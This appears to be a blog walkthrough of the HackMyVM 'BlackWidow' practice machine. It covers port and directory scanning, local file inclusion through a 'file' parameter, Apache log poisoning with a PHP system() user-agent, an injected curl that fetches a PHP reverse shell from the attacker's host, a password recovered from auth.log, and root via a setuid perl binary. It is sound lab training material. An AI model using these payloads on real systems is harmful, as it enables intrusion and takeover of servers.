日度归档:2021 年 5 月 25 日

HackMyVm BlackWidow Walkthrough

发表评论

HackMyVm BlackWidow Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=BlackWidow

Nmap scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100

 Nmap scan report for 192.168.56.100 (192.168.56.100)                                                                  
 Host is up (0.0024s latency).
 Not shown: 65526 closed ports
 PORT      STATE SERVICE    VERSION
 22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp    open  http       Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 111/tcp   open  rpcbind    2-4 (RPC #100000)
 ...
 2049/tcp  open  nfs_acl    3 (RPC #100227)
 3128/tcp  open  http-proxy Squid http proxy 4.6
 |_http-server-header: squid/4.6
 |_http-title: ERROR: The requested URL could not be retrieved
 38425/tcp open  mountd     1-3 (RPC #100005)
 41727/tcp open  mountd     1-3 (RPC #100005)
 43429/tcp open  nlockmgr   1-4 (RPC #100021)
 55311/tcp open  mountd     1-3 (RPC #100005)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 84]
 /docs                 (Status: 301) [Size: 315] [--> http://192.168.56.100/docs/]  
 /company              (Status: 301) [Size: 318] [--> http://192.168.56.100/company/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]

Check /company, found started.php.

 ~ gobuster dir -u http://192.168.56.100/company -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
   -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80_company.log
 ===============================================================
 /index.html           (Status: 200) [Size: 42271]
 /assets               (Status: 301) [Size: 325] [--> http://192.168.56.100/company/assets/]
 /forms                (Status: 301) [Size: 324] [--> http://192.168.56.100/company/forms/]
 /changelog.txt        (Status: 200) [Size: 1175]
 /Readme.txt           (Status: 200) [Size: 222]
 /started.php          (Status: 200) [Size: 42271]

Check sourcode of /company/index.html.

   <!-- =======================================================
   * Template Name: Arsha - v3.0.3
   * Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
   * Author: BootstrapMade.com
   * License: https://bootstrapmade.com/license/
   ========================================================

   We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.

  -->

Wfuzz LFI of started.php with parameter file.

 ~ wfuzz -u 'http://192.168.56.100/company/started.php?file=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt --hh 0
  /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000060:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../etc/passwd"            
 000000062:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../../../etc/passwd"
 000000061:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../etc/passwd"        
 000000403:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../etc/group"            
 000000404:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../../etc/group"

We can read /etc/passwd now.

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
 ...

Let's fuzz some log files which we can read.

 wfuzz -u "http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../..FUZZ" -w /usr/share/wordlists/logfiles.txt                                                                        
 ...
 000000031:   200        0 L      0 W        0 Ch        "/var/log/vsftpd.log"
 000000030:   200        0 L      0 W        0 Ch        "/var/log/error.log"
 000000032:   200        0 L      0 W        0 Ch        "/var/log/message"
 000000023:   200        0 L      0 W        0 Ch        "/usr/local/apache/logs/error_log"
 000000025:   200        0 L      0 W        0 Ch        "/var/log/apache/error_log"
 000000026:   200        0 L      0 W        0 Ch        "/var/log/apache2/error_log"
 000000018:   500        0 L      0 W        0 Ch        "/var/log/apache2/access.log"

Take care the response code for /var/log/apache2/access.log is 500, all other file is 200. That's because we run gobuster many times, and access.log file is too big for curl. We reset the VM to original status. Then we can access the file through LFI.

Also, we noticed that browser agent string is in the log file, which can be modified to shell code.

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log'
 192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:40 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
 192.168.56.150 - - [25/May/2021:04:24:49 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"

Set user agent to php shell code, and check if it works.

 curl -A '<?php system($_GET[c]); ?>' http://192.168.56.100        
 <html>
 <img src="wallpaper.jpg" alt="wallpaper" width="100%" height="100%">
 </html>

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=id'
 192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
 "
 192.168.56.150 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 251 "-" "curl/7.74.0"

In order to get a reverse shell, I tried many ways, at last used the following method. Run a temporary http server locally, with a php shell named "r" at root folder.

 sudo php -S 0.0.0.0:80
 [Tue May 25 19:53:10 2021] PHP 7.4.15 Development Server (http://0.0.0.0:80) started
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Accepted
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 [200]: (null) /r
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Closing

On VM, use curl to get reverse shell php named "r" and renamed it to "r.php".

 curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=curl%20http://192.168.56.150/r%20-o%20r.php'

Visit the php shell.

 curl http://192.168.56.100/company/r.php

Then we get reverse shell.

 nc -nlvp 1234                                                                      sudo-0 | 0 [19:54:47]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:48366.
 Linux blackwidow 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
  05:01:50 up 37 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Found a strange string in /var/backups/auth.log, which is viper's password. (I think this step is the most hard.)

 Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109  user=viper
 Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
 Dec 12 16:56:44 test sshd[29560]: pam_unix(sshd:auth): check pass; user unknown

Check bash history of viper.

 viper@blackwidow:~$ cat .bash_history
 ...
 arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 ls                                                  
 ./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 su root

Search file named arsenic.

 viper@blackwidow:~$ find / -name arsenic 2>/dev/null
 /home/viper/backup_site/assets/vendor/weapon/arsenic

Su root.

 viper@blackwidow:~$ /home/viper/backup_site/assets/vendor/weapon/arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 # id                                                
 uid=0(root) gid=1001(viper) groups=1001(viper)